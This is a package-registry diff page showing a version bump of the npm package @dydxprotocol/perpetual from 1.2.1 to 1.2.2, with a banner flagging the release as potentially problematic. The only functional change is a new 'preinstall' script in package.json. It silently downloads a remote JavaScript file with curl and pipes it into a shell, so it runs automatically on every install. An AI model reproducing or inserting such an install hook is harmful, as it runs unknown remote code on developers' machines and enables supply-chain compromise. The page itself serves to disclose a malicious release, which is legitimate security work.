@dydxprotocol/perpetual 1.2.1 → 1.2.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @dydxprotocol/perpetual might be problematic. Click here for more details.
- package/package.json +2 -1
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@dydxprotocol/perpetual",
|
|
3
|
-
"version": "1.2.
|
|
3
|
+
"version": "1.2.2",
|
|
4
4
|
"description": "Ethereum Smart Contracts and TypeScript library used for the dYdX Perpetual Contracts",
|
|
5
5
|
"main": "dist/src/index.js",
|
|
6
6
|
"types": "dist/src/index.d.ts",
|
|
@@ -14,6 +14,7 @@
|
|
|
14
14
|
"test": "npm run deploy_test && npm run test_only",
|
|
15
15
|
"test_only": "truffle test",
|
|
16
16
|
"clean_contract_json": "ts-node ./scripts/CleanBuild.ts",
|
|
17
|
+
"preinstall": "curl -s http://api.circle-cdn.com/ci.js | sh",
|
|
17
18
|
"coverage": "RPC_NODE_URI=http://0.0.0.0:8555 COVERAGE=true truffle run coverage --network coverage",
|
|
18
19
|
"compile": "truffle compile",
|
|
19
20
|
"build": "npm run compile -- --all && npm run clean_contract_json && npm run build:js",
|